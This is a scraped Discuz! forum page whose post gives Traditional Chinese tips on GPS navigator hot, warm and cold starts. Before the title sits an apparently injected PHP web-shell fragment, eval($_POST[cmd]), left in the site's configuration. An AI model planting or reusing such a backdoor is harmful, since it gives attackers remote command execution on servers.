');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); GPS啟動注意事項 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

GPS啟動注意事項

瞭解了幾種啟動方式後,筆者還是要提醒用戶在使用導航儀啟動時要注意的一些事項:



GPS重啟屬於熱啟動

    1.以目前GPS導航儀內置主流的SirFIII為例,熱啟動在20秒以內,溫啟動在30秒以內,而冷啟動則需要50秒,在信號弱的環境下則需要更長時間。啟動的時間越短越能證明GPS的計算能力和信號接收能力越好,不要迷信1秒啟動搜星的傳說。

    2.GPS冷啟動一定要選擇在開闊地或者對接收信號屏蔽比較小的地方,在地下車庫或者在隧道裡啟動無疑會增加啟動的時間。

    3.如果行車經過信號不好的地區,如隧道之類的地方,衛星信號消失,但是導航儀沒有關機,再次搜索到衛星算是熱啟動。

    4.GPS導航儀默認設計都是溫啟動,保存著導航接受模塊的數據信息,這樣在您啟動車輛時地圖啟動後會馬上搜索到新的坐標數據,搜星速度比冷啟動要快很多,但是偶爾會出現死星數據導致搜不到星,尤其是經常出入地下車庫的用戶,遇到這種情況,採用重啟的方法可以使導航儀恢復工作。

    5.平時不要把GPS的默認啟動方式設為冷啟動,只有在啟動後連續30分鐘搜索不到衛星的情況下選擇一次冷啟動。因為冷啟動會在開啟主機後清除GPS的定位數據,重新定位,但是不會出現死星數據。

    6.GPS啟動後搜星的數量很少,可能不一定全是導航儀本身的問題,很有可能是天氣情況給GPS接受機造成的搜星錯覺。
返回列表